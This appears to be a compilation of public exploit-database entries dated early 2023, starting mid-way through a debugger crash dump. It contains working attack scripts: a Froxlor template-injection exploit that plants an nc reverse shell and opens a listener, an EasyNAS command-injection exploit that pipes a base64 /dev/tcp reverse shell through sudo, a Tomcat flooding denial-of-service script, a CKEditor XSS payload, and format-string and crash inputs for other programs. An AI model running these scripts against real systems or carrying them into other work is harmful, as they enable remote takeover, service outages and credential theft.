00 00 00 00 00-00 00 00 00 f8 00 00 00 ................ 70fb0040 0e 1f ba 0e 00 b4 09 cd-21 b8 01 4c cd 21 54 68 ........!..L.!Th 70fb0050 69 73 20 70 72 6f 67 72-61 6d 20 63 61 6e 6e 6f is program canno 70fb0060 74 20 62 65 20 72 75 6e-20 69 6e 20 44 4f 53 20 t be run in DOS 70fb0070 6d 6f 64 65 2e 0d 0d 0a-24 00 00 00 00 00 00 00 mode....$....... 0:000> lmvm MSVCR120 Browse full module list start end module name 64460000 6454e000 MSVCR120 (private pdb symbols) C:\ProgramData\dbg\sym\msvcr120.i386.pdb\4D11E607E50346DDAB0C2C4FFC8716112\msvcr120.i386.pdb Loaded symbol image file: C:\WINDOWS\SYSTEM32\MSVCR120.dll Image path: C:\WINDOWS\SysWOW64\MSVCR120.dll Image name: MSVCR120.dll Browse all global symbols functions data Timestamp: Thu Jul 7 10:13:18 2016 (577E0F1E) CheckSum: 000F8AEF ImageSize: 000EE000 File version: 12.0.40660.0 Product version: 12.0.40660.0 File flags: 0 (Mask 3F) File OS: 4 Unknown Win32 File type: 2.0 Dll File date: 00000000.00000000 Translations: 0409.04b0 CompanyName: Microsoft Corporation ProductName: Microsoft® Visual Studio® 2013 InternalName: msvcr120.dll OriginalFilename: msvcr120.dll ProductVersion: 12.00.40660.0 FileVersion: 12.00.40660.0 built by: VSULDR FileDescription: Microsoft® C Runtime Library LegalCopyright: © Microsoft Corporation. All rights reserved. 0:000> x /D /f MSVCR120!getenv MSVCR120!getenv (char *) 0:000> x /D /f MSVCR120!getenv 64477785 MSVCR120!getenv (char *) .. 0:000> u 64477785 MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]: 64477785 6a0c push 0Ch 64477787 68f0774764 push offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0) 6447778c e8ea75ffff call MSVCR120!__SEH_prolog4 (6446ed7b) 64477791 8365e400 and dword ptr [ebp-1Ch],0 64477795 33c0 xor eax,eax 64477797 8b7508 mov esi,dword ptr [ebp+8] 6447779a 85f6 test esi,esi 6447779c 0f95c0 setne al 0:000> r eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 MSVCR120!_invoke_watson+0xe: 645046b1 cd29 int 29h 0:000> u 645046b1 MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]: 645046b1 cd29 int 29h 645046b3 56 push esi 645046b4 6a01 push 1 645046b6 be170400c0 mov esi,0C0000417h 645046bb 56 push esi 645046bc 6a02 push 2 645046be e85efeffff call MSVCR120!_call_reportfault (64504521) 645046c3 56 push esi 0:000> u 64477785 MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]: 64477785 6a0c push 0Ch 64477787 68f0774764 push offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0) 6447778c e8ea75ffff call MSVCR120!__SEH_prolog4 (6446ed7b) 64477791 8365e400 and dword ptr [ebp-1Ch],0 64477795 33c0 xor eax,eax 64477797 8b7508 mov esi,dword ptr [ebp+8] 6447779a 85f6 test esi,esi 6447779c 0f95c0 setne al 0:000> g WARNING: Continuing a non-continuable exception (4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 MSVCR120!_invoke_watson+0xe: 645046b1 cd29 int 29h --- C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%a.%b.%c.%d.%e.%f.%g.%h.%x.AAAAAAAAAAAAAA.%x.BBBAAAAAAAA=%p=AAAAA.%xAAAAA C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:11:44 : : Internal Error: can not replace file with temp file 02/02/23 17:11:44 : Background launch: User: 0x1.7474b0p-1019.b. .1897752.3.147818e+267.1445459053534108500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000.000000.1.36157e+267..0.AAAAAAAAAAAAAA.1cf784.BBBAAAAAAAA=7770C59F=AAAAA.47c778AAAAA

# Exploit Title: CKEditor 5 35.4.0 - Cross-Site Scripting (XSS) # Google Dork: N/A # Date: February 09, 2023 # Exploit Author: Manish Pathak # Vendor Homepage: https://cksource.com/ # Software Link: https://ckeditor.com/ckeditor-5/download/ # Version: 35.4.0 # Tested on: Linux / Web # CVE : CVE-2022-48110 CKSource CKEditor5 35.4.0 was discovered to contain a cross-site scripting (XSS) vulnerability via Full Featured CKEditor5 Widget as the editor fails to sanitize user provided data. An attacker can execute arbitrary script in the browser in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. CKEditor5 version 35.4.0 is tested & found to be vulnerable. Documentation avaiable at https://ckeditor.com/docs/ckeditor5/latest/features/html-embed.html#security Security Docs Says """The HTML embed feature does not currently execute code in <script> tags. However, it will execute code in the on* and src="javascript:..." attributes.""" Payload: <div class="raw-html-embed"> <script>alert(456)</script> </div>

# Exploit Title: ImageMagick 7.1.0-49 - Arbitrary File Read # Google Dork: N/A # Date: 06/02/2023 # Exploit Author: Cristian 'void' Giustini # Vendor Homepage: https://imagemagick.org/ # Software Link: https://imagemagick.org/ # Version: <= 7.1.0-49 # Tested on: 7.1.0-49 and 6.9.11-60 # CVE : CVE-2022-44268 (CVE Owner: Metabase Q Team https://www.metabaseq.com/imagemagick-zero-days/) # Exploit pre-requirements: Rust # PoC : https://github.com/voidz0r/CVE-2022-44268

# Exploit Title: Apache Tomcat 10.1 - Denial Of Service # Google Dork: N/A # Date: 13/07/2022 # Exploit Author: Cristian 'void' Giustini # Vendor Homepage: https://tomcat.apache.org/ # Software Link: https://tomcat.apache.org/download-10.cgi # Version: <= 10.1 # Tested on: Apache Tomcat 10.0 (Docker) # CVE : CVE-2022-29885 (CVE Owner: 4ra1n) # Exploit pre-requirements: pip install pwntools==4.8.0 # Analysis : https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/ #!/usr/bin/env python3 # coding: utf-8 from pwn import * import time import threading import subprocess threads = [] def send_payload(): r = remote("localhost", 4000) while True: r.send(b"FLT2002" + b"A" * 10000) for _ in range(5): new_thread = threading.Thread(target=send_payload) threads.append(new_thread) new_thread.start() for old_thread in threads: old_thread.join()

#!/usr/bin/python3 # Exploit Title: Froxlor 2.0.3 Stable - Remote Code Execution (RCE) # Date: 2023-01-08 # Exploit Author: Askar (@mohammadaskar2) # CVE: CVE-2023-0315 # Vendor Homepage: https://froxlor.org/ # Version: v2.0.3 # Tested on: Ubuntu 20.04 / PHP 8.2 import telnetlib import requests import socket import sys import warnings import random import string from bs4 import BeautifulSoup from urllib.parse import quote from threading import Thread warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4') if len(sys.argv) !=3D 6: print("[~] Usage : ./froxlor-rce.py url username password ip port") exit() url =3D sys.argv[1] username =3D sys.argv[2] password =3D sys.argv[3] ip =3D sys.argv[4] port =3D sys.argv[5] request =3D requests.session() def login(): login_info =3D { "loginname": username, "password": password, "send": "send", "dologin": "" } login_request =3D request.post(url+"/index.php", login_info, allow_redi= rects=3DFalse) login_headers =3D login_request.headers location_header =3D login_headers["Location"] if location_header =3D=3D "admin_index.php": return True else: return False def change_log_path(): change_log_path_url =3D url + "/admin_settings.php?page=3Doverview&part= =3Dlogging" csrf_token_req =3D request.get(change_log_path_url) csrf_token_req_response =3D csrf_token_req.text soup =3D BeautifulSoup(csrf_token_req_response, "lxml") csrf_token =3D (soup.find("meta", {"name":"csrf-token"})["content"]) print("[+] Main CSRF token retrieved %s" % csrf_token) multipart_data =3D { "logger_enabled": (None, "0"), "logger_enabled": (None, "1"), "logger_severity": (None, "2"), "logger_logtypes[]": (None, "file"), "logger_logfile": (None, "/var/www/html/froxlor/templates/Froxlor/f= ooter.html.twig"), "logger_log_cron": (None, "0"), "csrf_token": (None, csrf_token), "page": (None, "overview"), "action": (None, ""), "send": (None, "send") =20 } req =3D request.post(change_log_path_url, files=3Dmultipart_data) response =3D req.text if "The settings have been successfully saved." in response: print("[+] Changed log file path!") return True else: return False def inject_template(): admin_page_path =3D url + "/admin_index.php" csrf_token_req =3D request.get(admin_page_path) csrf_token_req_response =3D csrf_token_req.text soup =3D BeautifulSoup(csrf_token_req_response, "lxml") csrf_token =3D (soup.find("meta", {"name":"csrf-token"})["content"]) onliner =3D "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} = {1} >/tmp/f".format(ip, port) payload =3D "{{['%s']|filter('exec')}}" % onliner data =3D { "theme": payload, "csrf_token": csrf_token, "page": "change_theme", "send": "send", "dosave": "", } req =3D request.post(admin_page_path, data, allow_redirects=3DFalse) try: location_header =3D req.headers["Location"] if location_header =3D=3D "admin_index.php": print("[+] Injected the payload sucessfully!") except: print("[-] Can't Inject payload :/") exit() handler_thread =3D Thread(target=3Dconnection_handler, args=3D(port,)) handler_thread.start() print("[+] Triggering the payload ...") req2 =3D request.get(admin_page_path) def connection_handler(port): print("[+] Listener started on port %s" % port) t =3D telnetlib.Telnet() s =3D socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", int(port))) s.listen(1) conn, addr =3D s.accept() print("[+] Connection received from %s" % addr[0]) t.sock =3D conn print("[+] Heads up, incoming shell!!") t.interact() if login(): print("[+] Successfully Logged in!") index_url =3D url + "/admin_index.php" request.get(index_url) if change_log_path(): inject_template() else: print("[-] Can't login")

# Exploit Title: Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE) # Date: 2023-02-10 # Exploit Author: Andreas Finstad # Version: < 14.4.1.29 # Tested on: Windows Server 2022 # CVE : CVE-2023-23286 POC: https://f20.be/blog/provide-server-14-4

#Exploit Author: XWorm Trojan 2.1 - Null Pointer Derefernce DoS # Exploit Author: TOUHAMI KASBAOUI # Vendor Homepage: https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ # Software Link: N/A# Version: 2.1# Tested on: Windows 10 # CVE : N/A ================================================================== THE BUG : NULL pointer dereference -> DOS crash ================================================================== The sophisticated XWorm Trojan is well exploited by EvilCoder, where they collect different features such as ransomware and keylogger TAs to make it more risky for victims. The Trojan assigned to victims suffers from a NULL pointer deference vulnerability, which could lead to a denial of service for the server builder of the threat actor by getting his IP address and port of command and control. ================================================================== WINDBG ANALYSIS AFTER SENDING 1000 'A' BYTES ================================================================== (160.b98): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0330c234 ebx=0113e8d4 ecx=00000000 edx=018c0000 esi=0330c234 edi=0113e55c eip=078f5a59 esp=0113e4f8 ebp=0113e568 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 builder!XWorm.Client.isDisconnected+0xa9: 078f5a59 8b01 mov eax,dword ptr [ecx] ds:002b:00000000=???????? ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* MethodDesc: 055a86b4 Method Name: XWorm.Client.isDisconnected() Class: 09fe9634 MethodTable: 055a86d8 mdToken: 06000730 Module: 01464044 IsJitted: yes CodeAddr: 078f59b0 Transparency: Critical MethodDesc: 055a86b4 Method Name: XWorm.Client.isDisconnected() Class: 09fe9634 MethodTable: 055a86d8 mdToken: 06000730 Module: 01464044 IsJitted: yes CodeAddr: 078f59b0 Transparency: Critical Failed to request MethodData, not in JIT code range KEY_VALUES_STRING: 1 Key : AV.Dereference Value: NullPtr Key : AV.Fault Value: Read Key : Analysis.CPU.mSec Value: 6406 Key : Analysis.DebugAnalysisManager Value: Create Key : Analysis.Elapsed.mSec Value: 12344 Key : Analysis.IO.Other.Mb Value: 152 Key : Analysis.IO.Read.Mb Value: 3 Key : Analysis.IO.Write.Mb Value: 181 Key : Analysis.Init.CPU.mSec Value: 48905 Key : Analysis.Init.Elapsed.mSec Value: 6346579 Key : Analysis.Memory.CommitPeak.Mb Value: 200 Key : CLR.BuiltBy Value: NET48REL1LAST_C Key : CLR.Engine Value: CLR Key : CLR.Version Value: 4.8.4515.0 Key : Timeline.OS.Boot.DeltaSec Value: 7496 Key : Timeline.Process.Start.DeltaSec Value: 6371 Key : WER.OS.Branch Value: vb_release Key : WER.OS.Timestamp Value: 2019-12-06T14:06:00Z Key : WER.OS.Version Value: 10.0.19041.1 Key : WER.Process.Version Value: 2.1.0.0 NTGLOBALFLAG: 0 PROCESS_BAM_CURRENT_THROTTLED: 0 PROCESS_BAM_PREVIOUS_THROTTLED: 0 APPLICATION_VERIFIER_FLAGS: 0 EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 078f5a59 (builder!XWorm.Client.isDisconnected+0x000000a9) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 00000000 Attempt to read from address 00000000 FAULTING_THREAD: 00000b98 PROCESS_NAME: builder.exe READ_ADDRESS: 00000000 ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE_STR: c0000005 EXCEPTION_PARAMETER1: 00000000 EXCEPTION_PARAMETER2: 00000000 IP_ON_HEAP: 078f5a59 The fault address in not in any loaded module, please check your build's rebase log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may contain the address if it were loaded. STACK_TEXT: 0113e568 73140556 00000000 00000000 00000000 builder!XWorm.Client.isDisconnected+0xa9 0113e574 7314373a 0113e8d4 0113e5b8 732dd3f0 clr!CallDescrWorkerInternal+0x34 0113e5c8 7321f0d1 c887551e 00000000 0335b7dc clr!CallDescrWorkerWithHandler+0x6b 0113e608 7321f1d6 731d7104 0335b7dc 055ab280 clr!CallDescrWorkerReflectionWrapper+0x55 0113e90c 7212853c 00000000 0330a1dc 00000000 clr!RuntimeMethodHandle::InvokeMethod+0x838 0113e930 72114a9d 00000000 00000000 00000000 mscorlib_ni! 0113e94c 6e14bf55 00000000 00000000 00000000 mscorlib_ni! 0113e968 6e14be68 00000000 00000000 00000000 System_Windows_Forms_ni! 0113e990 72118604 00000000 00000000 00000000 System_Windows_Forms_ni! 0113e9f4 72118537 00000000 00000000 00000000 mscorlib_ni! 0113ea08 721184f4 00000000 00000000 00000000 mscorlib_ni! 0113ea24 6e14bdfa 00000000 00000000 00000000 mscorlib_ni! 0113ea40 6e14bb9a 00000000 00000000 00000000 System_Windows_Forms_ni! 0113ea80 6e13b07f 00000000 00000000 00000000 System_Windows_Forms_ni! 0113eacc 6e144931 00000000 00000000 00000000 System_Windows_Forms_ni! 0113ead8 6e1445f7 00000000 00000000 00000000 System_Windows_Forms_ni! 0113eaec 6e13af53 00000000 00000000 00000000 System_Windows_Forms_ni! 0113eaf4 6e13aee5 00000000 00000000 00000000 System_Windows_Forms_ni! 0113eb08 6e13a820 00000000 00000000 00000000 System_Windows_Forms_ni! 0113eb58 0146d08e 00000000 00000000 00000000 System_Windows_Forms_ni! WARNING: Frame IP not in any known module. Following frames may be wrong. 0113eb8c 7650148b 000606f4 0000c250 00000000 0x146d08e 0113ebb8 764f844a 05823e56 000606f4 0000c250 USER32!_InternalCallWinProc+0x2b 0113ec9c 764f61ba 05823e56 00000000 0000c250 USER32!UserCallWinProcCheckWow+0x33a 0113ed10 764f5f80 0113ed98 0113ed58 6e19e5ed USER32!DispatchMessageWorker+0x22a 0113ed1c 6e19e5ed 0113ed98 c9b28348 731410fc USER32!DispatchMessageW+0x10 0113ed58 6e14b44f 00000000 00000000 00000000 System_Windows_Forms_ni+0x22e5ed 0113eddc 6e14b03d 00000000 00000000 00000000 System_Windows_Forms_ni! 0113ee30 6e14ae93 00000000 00000000 00000000 System_Windows_Forms_ni! 0113ee5c 014b2694 00000000 00000000 00000000 System_Windows_Forms_ni! 0113ee84 014b2211 00000000 00000000 00000000 0x14b2694 0113eeac 014b1871 00000000 00000000 00000000 0x14b2211 0113eef8 014b08b7 00000000 00000000 00000000 0x14b1871 0113ef28 73140556 00000000 00000000 00000000 builder!XWorm.My.MyApplication.Main+0x6f 0113ef34 7314373a 0113efc4 0113ef78 732dd3f0 clr!CallDescrWorkerInternal+0x34 0113ef88 73149adb 00000000 030622ec 73171e90 clr!CallDescrWorkerWithHandler+0x6b 0113eff0 732bff7b 0113f0cc c8874202 01466f94 clr!MethodDescCallSite::CallTargetWorker+0x16a 0113f114 732c065a 0113f158 00000000 c8874096 clr!RunMain+0x1b3 0113f380 732c0587 00000000 c8874b72 00700000 clr!Assembly::ExecuteMainMethod+0xf7 0113f864 732c0708 c8874baa 00000000 00000000 clr!SystemDomain::ExecuteMainMethod+0x5ef 0113f8bc 732c082e c8874bea 00000000 732bc210 clr!ExecuteEXE+0x4c 0113f8fc 732bc235 c8874a2e 00000000 732bc210 clr!_CorExeMainInternal+0xdc 0113f938 7398fa84 84112dff 73a24330 7398fa20 clr!_CorExeMain+0x4d 0113f970 73a1e81e 73a24330 73980000 0113f998 mscoreei!_CorExeMain+0xd6 0113f980 73a24338 73a24330 76b600f9 00f94000 MSCOREE!ShellShim__CorExeMain+0x9e 0113f998 76b600f9 00f94000 76b600e0 0113f9f4 MSCOREE!_CorExeMain_Exported+0x8 0113f998 77997bbe 00f94000 3d39c64a 00000000 KERNEL32!BaseThreadInitThunk+0x19 0113f9f4 77997b8e ffffffff 779b8d3f 00000000 ntdll!__RtlUserThreadStart+0x2f 0113fa04 00000000 00000000 00000000 00000000 ntdll!_RtlUserThreadStart+0x1b STACK_COMMAND: ~0s ; .cxr ; kb SYMBOL_NAME: builder!XWorm.Client.isDisconnected+a9 MODULE_NAME: builder IMAGE_NAME: builder.exe FAILURE_BUCKET_ID: NULL_POINTER_READ_c0000005_builder.exe!XWorm.Client.isDisconnected OS_VERSION: 10.0.19041.1 BUILDLAB_STR: vb_release OSPLATFORM_TYPE: x86 OSNAME: Windows 10 IMAGE_VERSION: 2.1.0.0 FAILURE_ID_HASH: {ab0d02c5-881b-c628-2858-a241c5c41b1f} Followup: MachineOwner --------- TS: Exploitable - Data from Faulting Address controls Code Flow starting at builder!XWorm.Client.isDisconnected+0x00000000000000a9 (Hash=0xc8c3bc2d.0x7badd95a)

# Exploit Title: EasyNas 1.1.0 - OS Command Injection # Date: 2023-02-9 # Exploit Author: Ivan Spiridonov ([email protected]) # Author Blog: https://xbz0n.medium.com # Version: 1.0.0 # Vendor home page : https://www.easynas.org # Authentication Required: Yes # CVE : CVE-2023-0830 #!/usr/bin/python3 import requests import sys import base64 import urllib.parse import time from requests.packages.urllib3.exceptions import InsecureRequestWarning # Disable the insecure request warning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) if len(sys.argv) < 6: print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort") sys.exit() url = sys.argv[1] user = sys.argv[2] password = sys.argv[3] # Create the payload payload = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(sys.argv[4], sys.argv[5]) # Encode the payload in base64 payload = base64.b64encode(payload.encode()).decode() # URL encode the payload payload = urllib.parse.quote(payload) # Create the login data login_data = { 'usr':user, 'pwd':password, 'action':'login' } # Create a session session = requests.Session() # Send the login request print("Sending login request...") login_response = session.post(f"https://{url}/easynas/login.pl", data=login_data, verify=False) # Check if the login was successful if 'Login to EasyNAS' in login_response.text: print("Unsuccessful login") sys.exit() else: print("Login successful") # send the exploit request timeout = 3 try: exploit_response = session.get(f'https://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23', headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout = timeout, verify=False) if exploit_response.status_code != 200: print("[+] Everything seems ok, check your listener.") else: print("[-] Exploit failed, system is patched or credentials are wrong.") except requests.exceptions.ReadTimeout: print("[-] Everything seems ok, check your listener.") sys.exit()